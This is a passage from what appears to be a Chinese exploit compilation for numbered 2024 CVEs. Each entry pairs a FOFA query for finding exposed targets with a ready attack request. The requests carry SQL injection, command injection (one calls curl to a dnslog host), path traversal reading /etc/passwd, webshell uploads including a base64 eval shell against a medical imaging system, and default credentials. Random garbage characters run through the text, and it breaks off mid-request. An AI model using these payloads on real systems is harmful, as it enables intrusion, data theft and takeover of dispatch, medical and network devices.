A! C+ f3 `- U* M% `2 m uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 b) z; l: L& X# {8 ?+ Y4 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 W, z. D t8 Q/ [( i% G2 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 C/ i7 t; z; D5 X4 j3 uAccept-Encoding: gzip, deflate, br; @0 o7 K5 C. s) W) ~
Connection: close
& E, c2 c4 G+ r% h9 @- [Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
, I% B& v8 ?# V+ y1 ]. AUpgrade-Insecure-Requests: 1
: W- b2 M5 ~$ {8 q! k I4 K( _2 D
+ F/ Y \7 q8 F+ T0 V5 l6 [
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入9 q' l9 g7 v* b, R J7 _
CVE-2024-2566+ [. s3 `- I$ p4 F
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
$ B& F" J9 {: C/ M0 l( BGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.16 P) G6 V$ K, ]/ K' {" R
Host: x.x.x.x/ @+ e# R- N8 v; m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; r% M# |: ^2 l% {* X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ ~9 ?& x3 b TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% s2 A0 b6 V% P. v" d5 B
Accept-Encoding: gzip, deflate, br" F {0 \' n2 a7 l' q
Connection: close9 \4 m( ]' p3 k2 w1 q' j1 [! B" a
Cookie: authcode=h8g9
p" ~) A% v5 Y6 D( J E# d& yUpgrade-Insecure-Requests: 12 p3 {7 @ N. M' s$ Q' F8 H
7 ?6 S* A W( ?& v) j/ R K0 I
6 x! p, h$ Q( D2 U9 p8 d7 H- o( I
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入 f! k I) L; Y r
FOFA:body="指挥调度管理平台"5 i" c" C( W1 z* ~0 K8 u4 o' Q
POST /app/ext/ajax_users.php HTTP/1.1/ L" g& m6 L& e A$ f; E
Host: your-ip
6 H! g: ?. L$ \) V$ B$ z* }User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info- Y' [% @5 h7 b/ q2 O
Content-Type: application/x-www-form-urlencoded" x! f' ] e$ P5 H5 l2 B
$ R* M- f7 ]4 u5 I+ ~1 [$ J! z8 d' V5 e: o+ U8 S
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
3 O, v6 V% ~4 i" |/ D) h$ V
' x( F' T# X+ ?# ]: @3 C4 }( V1 d: Y8 b8 L m' n6 s# O9 P. _
142. CMSV6车辆监控平台系统中存在弱密码
2 x4 F- [# G- g& d( c* xCVE-2024-29666
- k" Y' S6 g% k. ~FOFA:body="/808gps/"7 g2 K( i: U1 n
admin/admin
# [4 T: h B- \143. Netis WF2780 v2.1.40144 远程命令执行
% P! ~3 J0 n8 m4 L; ^: MCVE-2024-25850
- J5 B% _( ~" L8 G; \% mFOFA:title='AP setup' && header='netis') b& `; N8 X. T! Q* c |
PAYLOAD% @, t1 s. Y( h" N3 ^2 l
: g& l+ z8 J0 N& J. @. Y144. D-Link nas_sharing.cgi 命令注入
: `, h/ A9 B+ L" [FOFA:app="D_Link-DNS-ShareCenter"
6 v* @# [8 J9 G& e; ^system参数用于传要执行的命令3 ?- o& C" j% P7 p) g1 s
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1, B9 Z' e. t9 m7 r
Host: x.x.x.x
3 k( t7 L# ~) uUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0, Q) Q& I2 ~6 a4 j0 H7 }) N3 S
Connection: close/ a! v: l8 K6 |! d- S$ A2 Q
Accept: */*
3 D% ?' S% u3 gAccept-Language: en
& C% L7 w8 ^% f/ i) b/ O vAccept-Encoding: gzip
) b+ n: v( p1 r# h6 H
2 }8 M+ E4 x% t, ~/ u' W- N0 q i! i% Y
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
) N1 {9 S" h# m8 t& YCVE-2024-3400
0 _, }9 C6 P) w' _9 \" h; Z/ F6 s2 ZFOFA:icon_hash="-631559155"" v5 t+ t5 K" J7 d) W: C
GET /global-protect/login.esp HTTP/1.10 {, f7 F$ x, o$ I; o% s4 R+ U1 W
Host: 192.168.30.112:1005* J7 `0 B" O& a& B! |. a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.845 x+ S- W- R( f0 N" x
Connection: close1 W' S8 ]* Q+ R- ^
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;& M; R1 `7 o. ]5 W
Accept-Encoding: gzip% R2 n% I D! B' A! ]# @; r2 V8 g W
3 Q( r t7 s) ?5 K' r
/ O) X' a: O* {& v7 U3 s: |0 F146. MajorDoMo thumb.php 未授权远程代码执行
! k0 [% t4 j5 e$ C9 L$ S$ g2 iCNVD-2024-02175, Z* Q8 s/ N* b' o' n
FOFA:app="MajordomoSL"4 i, `0 w* e4 e/ t* F
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1/ u8 C2 H& D' V/ o
Host: x.x.x.x- S+ H% F/ i; m" w( A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
6 h3 U# F( B2 v( {Accept-Charset: utf-8, A4 y8 J' d- n$ @* k# T
Accept-Encoding: gzip, deflate/ n- o% _0 ]+ Y {; Z( B; ]7 x8 l: B. v
Connection: close6 s. q7 j! ]7 A% u5 C
& ^7 ^& w3 |. k: O6 E
$ q2 i ]+ h/ [+ @147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
) r( k2 M& r7 M/ g0 c" L; uCVE-2024-323991 ^/ m) f, D9 o `) H/ E( V2 f
FOFA:body="RaidenMAILD"
* n% o. _4 o- N/ z$ BGET /webeditor/../../../windows/win.ini HTTP/1.1
* ^: ]1 @7 L# e% o1 G; `1 IHost: 127.0.0.1:817 `/ Y* Q" N/ b1 l7 W1 c! f' h
Cache-Control: max-age=0
5 M( F0 i' f4 o2 D( V+ E7 V, gConnection: close
8 L3 k7 d7 ~, l) a" C" ?4 G s
1 W0 ?" P" \+ y+ R; {1 {/ `8 u& ^1 M0 E# F1 b# ^
148. CrushFTP 认证绕过模板注入
- H3 L# `: p9 ~1 `+ [CVE-2024-4040' G0 J( Q" D, D1 X* z: Q
FOFA:body="CrushFTP"$ m: w! I/ m+ R: p: D0 }' y
PAYLOAD) c3 r* I x: x6 a; ~0 u6 C
, ^: x8 i+ v0 S7 `2 [149. AJ-Report开源数据大屏存在远程命令执行) k# q" _) A2 e6 \/ p
FOFA:title="AJ-Report"1 F4 Y; B4 E# c2 c# ^4 j" S7 f
& X, F' N$ u. W- n cPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
- m9 F( a' k2 l7 Y9 r7 ]! _: IHost: x.x.x.x
0 d7 i% f4 s1 J5 A; J& v8 yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 Z$ I+ x9 E U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ I7 D o, v& Y9 O& Y# t7 [
Accept-Encoding: gzip, deflate, br
; ^2 i4 Q$ k5 A3 m0 A) T2 P2 \, U; m0 m- zAccept-Language: zh-CN,zh;q=0.9 E3 U& b9 n2 o8 J
Content-Type: application/json;charset=UTF-8
' ~& n6 I9 F, R" N: ~Connection: close
; P8 M, Y' [5 k) o# e1 Y, P' l! g
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}3 J/ D+ Z) P6 [" K
9 s& E" O3 s' A, W x150. AJ-Report 1.4.0 认证绕过与远程代码执行
% \6 L1 W6 ~* _3 g8 Y% \FOFA:title="AJ-Report"6 g5 x$ Q' c* \2 N; ?/ t* ]8 E
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1& c' R+ l9 I9 P: P1 M) {! ?
Host: x.x.x.x/ C- T( }! A( L% }; T) }) D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
2 Z, L+ f, V; w: L9 h5 C( r3 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' e i7 H5 Q0 a
Accept-Encoding: gzip, deflate, br
, O, A- y& O. n, b$ Y) N# s5 b& XAccept-Language: zh-CN,zh;q=0.9
7 H% j+ a- F, c3 \- H& MContent-Type: application/json;charset=UTF-8
# c& W4 j9 w7 x- K2 A* aConnection: close
/ [3 l1 q) `5 [4 RContent-Length: 339: d3 `" y) D7 ~6 ^; Z* h
& [; I2 `3 Z! U
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
$ A* V) i2 u& k3 _9 Z' o* y# ^% }' Y; j0 M A- _; {5 c# `( I
w0 A7 l5 @. O9 |7 u3 `
151. AJ-Report 1.4.1 pageList sql注入7 q! l G) E7 |( O
FOFA:title="AJ-Report"
( f" J6 M: S8 \' p, nGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
% W! G( u; i" e& m3 S0 `Host: x.x.x.x
/ p" H. n6 A2 [( ^1 u2 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ t% u; p( M8 D3 S/ n x0 V f
Connection: close ^4 c2 G3 H K* y4 v
Accept-Encoding: gzip
- i7 F v* P2 D& O! s' o- B; H; Q- x1 P+ g3 w0 [' Y7 `
% g( T# m9 p! X) n; p7 d8 T8 H' K
152. Progress Kemp LoadMaster 远程命令执行
) ?$ m: `9 D, u* U0 O# D" i) a+ FCVE-2024-1212
' l Q& t6 Y KLoadMaster <= 7.2.59.2 (GA)! ^# R* a2 t, a1 [
LoadMaster<=7.2.54.8 (LTSF)# g, m1 x# E7 d5 j
LoadMaster <= 7.2.48.10 (LTS)/ m! ?* K' w+ A4 a3 j" v
FOFA:body="LoadMaster"3 { W3 b, t+ B( K
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码! b# C0 O0 C9 M
GET /access/set?param=enableapi&value=1 HTTP/1.1/ ]* g; ?+ y- t2 o: I
Host: x.x.x.x
' @( X- i) b! A$ B& hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.10 R/ ~3 k9 |/ H2 y* K! F, s- Y( h% z
Connection: close8 E* c7 W/ }* s6 V+ {
Accept: */*: C$ `2 }+ I) s7 N1 M) u# L
Accept-Language: en! W8 O. ~# o2 F, ~3 C
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
/ w+ p J6 A/ o7 P c+ iAccept-Encoding: gzip5 q8 r9 s. L* [( T. _
) P$ {5 i" z/ e* {" ^ @. k
7 E( v$ d4 q! j; q) u
153. gradio任意文件读取, }! z5 A) ^( m, G1 @1 Q! m- ?: b2 @
CVE-2024-1561FOFA:body="__gradio_mode__"
! N' y# U3 y; B- @& ^; D第一步,请求/config文件获取componets的id$ L# \1 E5 Z+ F; j9 K# u/ `6 `
http://x.x.x.x/config% i, x J2 U! Q5 m/ T2 k" V
/ H. R- U' d1 F- T! J7 i6 `: d
2 m# t% ?$ r# D% [8 `* N第二步,将/etc/passwd的内容写入到一个临时文件! T0 j4 I* t; ^6 z3 |0 A6 T
POST /component_server HTTP/1.1
* h* s* u7 G) y3 i; ]* kHost: x.x.x.x
. f2 j( g+ M! z' Q- x, k5 s9 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.32 Y& t3 D- E6 s+ u. Y' t% Z, n
Connection: close
9 s% e% L" y" F2 k; w o4 BContent-Length: 115( x" ]/ D3 q0 q; V- N5 U7 z) L
Content-Type: application/json+ h! d4 L& ], ]. K7 l
Accept-Encoding: gzip
5 x* B* g" m& B7 W/ j9 V0 v4 `/ _ M" x( Z
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}7 X9 _, t# O" ]6 k9 Y
: }9 S4 X6 d( f2 E D1 ] m3 b h/ A( {5 O \" l
第三步访问
\2 [! V0 d" M% A9 H( Qhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
' L# C3 t# x* f9 p5 q. M' r _
y E- l" z' @4 N5 M8 Z8 w154. 天维尔消防救援作战调度平台 SQL注入" D% A. o3 Z8 U
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入": k: r4 X8 f0 R2 r. \7 t$ H
POST /twms-service-mfs/mfsNotice/page HTTP/1.12 z# f' R0 q$ I+ O9 _1 V7 s O/ N* }
Host: x.x.x.x+ }( w5 Q" p. I, s! m
Content-Length: 106
0 i7 Y* _, P3 E7 _8 D+ {Cache-Control: max-age=03 ~4 \. ?+ Q: x8 w
Upgrade-Insecure-Requests: 1
0 t) i: v& g1 AOrigin: http://x.x.x.x# Q2 u% ~; Y Q- ^$ x: ~
Content-Type: application/json6 X, i/ R/ o$ F9 U g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.366 T$ e, X/ }. D' N/ L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; L* e% z- O: q+ k
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page. L; r, ?+ E/ K7 K! A; Q* `9 `7 [
Accept-Encoding: gzip, deflate4 z4 {1 [# O9 S$ E3 y4 z! ]
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
/ }9 y$ {$ q5 E8 e1 V+ e6 TConnection: close1 J( O- N7 Q L9 L' K1 @0 S
. }: `( G+ d3 I; e{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}! k' \' S' F- H5 C" l9 K- H
8 r. ]5 \, l1 r; c
1 F& d& a3 o4 j7 x. @
155. 六零导航页 file.php 任意文件上传' n! U( }! D) N. h1 F" d) W. A- k
CVE-2024-34982" | T6 V3 r0 Q6 F% S
FOFA:title=="上网导航 - LyLme Spage"% G) q( X# f. r& [
POST /include/file.php HTTP/1.1/ ~6 P8 B: z; J% ?2 k& u. @: _
Host: x.x.x.x9 b" k# Y+ D2 B6 t" R) Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.04 `# k! j- i9 K7 a
Connection: close% p, M8 b" M4 }" e" o
Content-Length: 2323 i8 V( U. Q) q% y8 f) s9 f8 g2 r# h
Accept: application/json, text/javascript, */*; q=0.012 ?" A7 M# ]# P9 B* h% B z4 G
Accept-Encoding: gzip, deflate, br
* h4 N9 L3 ]+ B2 c7 v0 w1 h* aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) f# s. a0 u& Y! d3 `* G @8 l
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
8 E; u# ]( k; ~, Y' G+ q7 W rX-Requested-With: XMLHttpRequest1 I) |' t8 l7 R6 w- \4 H
3 p. x) i J* Y$ X2 P" V
-----------------------------qttl7vemrsold314zg0f
: Y; k5 W5 X- G; {Content-Disposition: form-data; name="file"; filename="test.php"+ T- C8 y) \+ n: w2 [5 {
Content-Type: image/png& E/ X9 ~! y3 D5 V% `* n# ^) E3 [0 ]0 J
2 l& Y- S; s0 T<?php phpinfo();unlink(__FILE__);?>
8 R$ r3 m& F+ r6 h0 c3 N0 ?- ]-----------------------------qttl7vemrsold314zg0f--$ n% I0 d: u3 j) B2 m" {
. d, L% H: v7 ^" _$ y R
% a6 }. V7 J3 }. v* ]
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
$ b3 A7 b* ]% c0 T
2 ]( i8 S3 D" ?" e2 o$ ]- S6 U156. TBK DVR-4104/DVR-4216 操作系统命令注入0 Z g( F' u/ i0 Z# E# U0 k! |
CVE-2024-3721
$ z: n" N- D# m& BFOFA:"Location: /login.rsp"
, i) U5 Q% H4 }" x4 r·TBK DVR-4104
0 |7 }, j5 w# f- G1 d/ Y·TBK DVR-4216, M* d! K4 ?4 Y( _! p
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"8 ?, w. D2 [8 {
3 T& w5 b+ _+ ?; D6 ]- S7 X: M* b
$ R4 ~4 q2 f7 }/ t% i- y3 WPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
$ X9 S- T u0 J4 o; L, O' ]# fHost: x.x.x.x
4 {) }* ^+ h8 R3 E3 E$ B0 oUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ L1 L( }' Q/ k1 S, z
Connection: close
. F/ _7 h, w6 k& \Content-Length: 0: ^2 l* Y+ b! G0 g5 L. d
Cookie: uid=1
( k# d6 d4 A: ?7 CAccept-Encoding: gzip- X3 |3 T1 a) h k5 |* z8 i) a1 |
7 x- p, z# } }+ q0 [% I/ h; T" A, M" J8 c7 O" ]+ Y% s3 K( O
157. 美特CRM upload.jsp 任意文件上传
, R) X: A: _% f3 e5 q1 t, l; U& ICNVD-2023-06971
' ]4 ^% K0 a5 _! I; pFOFA:body="/common/scripts/basic.js"& \4 W% X7 b/ o! J- b8 [
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.18 T2 p( o2 B$ L4 I% R6 l( ~6 B
Host: x.x.x.x( [2 Y, b1 O# t0 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36/ I. Y' |0 I$ Y, R8 V5 l
Content-Length: 709
. F3 w2 J) y) O: P) H! FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, U w; q% K; `, \2 J
Accept-Encoding: gzip, deflate& P& A% k# x4 y5 E) ?
Accept-Language: zh-CN,zh;q=0.9
0 R) j2 W' S$ f" n/ t" rCache-Control: max-age=0
) G7 b$ O, T, [5 D8 m; dConnection: close
) d% T6 {- R( {, X) bContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN: O" h& ?% h6 b* z; d2 P' x
Upgrade-Insecure-Requests: 1. M! |, k/ W" A: C- m0 ~! d
/ Y+ Q4 C/ \. u/ S- d; f6 W E------WebKitFormBoundary1imovELzPsfzp5dN) K2 d3 c4 ]2 a# L+ U
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
) A1 k0 P- |$ a' J4 DContent-Type: application/octet-stream
6 g) Q- K8 g" Y3 L7 _1 D$ j" J7 `# }) J% t0 g7 R. q
nyhelxrutzwhrsvsrafb
+ ]) ?; N7 K6 a------WebKitFormBoundary1imovELzPsfzp5dN
% k0 C% b+ P: }/ [9 j; mContent-Disposition: form-data; name="key"9 i$ d# X# q% }) n6 u' ]
3 q- W& T/ ~! N; e1 A, Z( a' u
null
* P- n: \7 J* C# t6 L------WebKitFormBoundary1imovELzPsfzp5dN
3 ^6 L) g$ a! G! gContent-Disposition: form-data; name="form"; b4 Q% s7 H& v7 ~7 T& r- {
4 X* Q+ f7 d6 K5 y( D) Z" _, K) ?& _! Snull
( x" N7 ~. A( w b------WebKitFormBoundary1imovELzPsfzp5dN
. X8 u- N( _0 C9 M2 ^Content-Disposition: form-data; name="field"
# t4 R3 A/ }5 d" ~9 C2 A, P3 w# I' l1 w% G# Z0 S
null9 r5 f8 T: l$ S% |$ p; y
------WebKitFormBoundary1imovELzPsfzp5dN' B2 q* i7 L% ^* H& O7 [: p
Content-Disposition: form-data; name="filetitile"' C7 c' N: f V3 k5 i5 z
- S/ l$ i- M3 cnull. g4 X" x/ J) ]0 H) ?' ?
------WebKitFormBoundary1imovELzPsfzp5dN! v" v# A: P: F7 N9 {8 }- S
Content-Disposition: form-data; name="filefolder"
; ?" j/ q2 J: C' q7 |9 f+ x: W: Q& r+ w
null
5 r$ D' T. A/ d3 c* X------WebKitFormBoundary1imovELzPsfzp5dN--
' Z4 ^5 W$ h U
% z% U1 R* a" B0 l; ~/ n) i8 s& i* h; x* N
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp" V4 J! G, m0 M; X/ ~
9 F- r4 h% ?- y( i
158. Mura-CMS-processAsyncObject存在SQL注入! \9 [* m/ ?5 V! m0 H1 m
CVE-2024-32640
( ~2 _. o& [# g* x' V k& _3 Q; ~FOFA:"Generator: Masa CMS"
! N8 a+ ?9 T4 P! i2 Y" XPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
$ N& \7 \' z. s$ dHost: {{Hostname}}8 P# @6 v& y3 D8 r
Content-Type: application/x-www-form-urlencoded- n" h& X! h0 H6 R
6 c1 n B$ c! N- A3 }; U, `+ e( ~object=displayregion&contenthistid=x\'&previewid=1& N: J: a5 ^# o; s6 A: i7 g/ O1 n4 x
, v& b6 Q* t: `4 ^6 _' V" O4 t/ r) R) B
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传3 Y) N& l) \7 O) V5 s$ ?! j
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928") t& k& `" O, I+ g5 ]- b( V
POST /webservices/WebJobUpload.asmx HTTP/1.1( @: ~/ U) r8 R, q8 y% M
Host: x.x.x.x) ^ l+ C% n' L+ V- j" K' }3 @2 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
9 ~+ f. j2 z1 K" r+ P: mContent-Length: 10802 B5 ], J1 O9 O+ w
Accept-Encoding: gzip, deflate
% I9 }% w" Y. }- e& M2 qConnection: close
# Y6 {) }4 ]' y; _) T- oContent-Type: text/xml; charset=utf-8& G2 N5 S5 W" T$ |3 x) s( H
Soapaction: "http://rainier/jobUpload"3 i1 Y( |% n5 A8 t% \) ~- a: r
5 A* J! a1 D A& c7 ^$ t& c
<?xml version="1.0" encoding="utf-8"?>% j8 H2 z4 c& F4 S0 X
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">: U. ^3 K& w0 `! @! P; z; l( H
<soap:Body>3 s1 o% q9 v& |4 M, Y
<jobUpload xmlns="http://rainier">
/ B7 l/ ~- G: A) D. `9 i: t: d<vcode>1</vcode>
/ [- Q E9 v9 Z<subFolder></subFolder>
) q! x8 m( }5 c/ C, d m<fileName>abcrce.asmx</fileName>- M V) Z! A( L" V( J
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>$ D9 u4 O' n1 \1 R8 z
</jobUpload>
1 a; X& V5 f, H8 Q</soap:Body>
5 R" `0 O3 Z% L1 h6 i4 D8 l5 e</soap:Envelope>
7 @' y8 E L0 U% ~& K3 d u( H' \$ n/ L$ e+ S, x! O# c) S& n! {
! _3 g. @- a! D, S
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")0 }9 b2 E1 {$ M9 [, d
+ v& J* N" o6 M. a
2 D3 k) H7 O1 i1 ?% v4 }
160. Sonatype Nexus Repository 3目录遍历与文件读取
: M% ]7 K) i9 e/ k( lCVE-2024-4956
2 l" W" T' P# d9 h) DFOFA:title="Nexus Repository Manager"# o- T+ k& W7 H% p; `# o6 d
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1+ M6 o4 D) u \* j
Host: x.x.x.x
. e i7 O2 k8 F5 e* r" g5 U' t! ?. SUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.08 o$ n6 i% G: ^) l; N
Connection: close" P7 Q! H/ s' j$ j9 w7 u! ~
Accept: */*
5 S, ?& e: `# |, NAccept-Language: en3 M9 ~- L# @/ W: \4 z
Accept-Encoding: gzip
2 t. i; n, q/ B% K# V. Y3 [$ k7 m6 R$ F6 Z1 U, o. \
. p9 t: h: H' \8 J p4 A
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
8 ?9 W/ q) F% a1 ^FOFA:body="/KT_Css/qd_defaul.css"( p0 g+ O: @9 C6 f
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密: M% O6 n' a' T9 s! p
POST /Webservice.asmx HTTP/1.1; ~+ H* b$ u# u; b9 ]9 g6 i
Host: x.x.x.x! I$ S+ E4 E3 S+ l# g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36: j9 |+ s* _, V9 S2 f
Connection: close( s1 ?- i0 L, L' `3 H' O
Content-Length: 445
; `2 u+ r* D+ H l- E' b- XContent-Type: text/xml) i* O3 c! ^2 g. X B
Accept-Encoding: gzip. O$ W: z+ b! b
' e. n6 E( O: g6 Z' o" C
<?xml version="1.0" encoding="utf-8"?>3 S+ @7 Q+ \) ?$ s- G
<soap:Envelope xmlns:xsi=", u- \5 S% J5 o+ @2 W( R
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"- ~8 Y/ b7 d: Q1 ?6 P6 w: e
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" P% U9 T( o; ^9 `! p: v' d0 V# v U
<soap:Body>1 A. F5 h+ H$ _: w
<UploadResume xmlns="http://tempuri.org/">- _% w: b# z! k+ T# a2 T( `- z
<ip>1</ip>. X1 O. N b5 [9 W4 P8 p
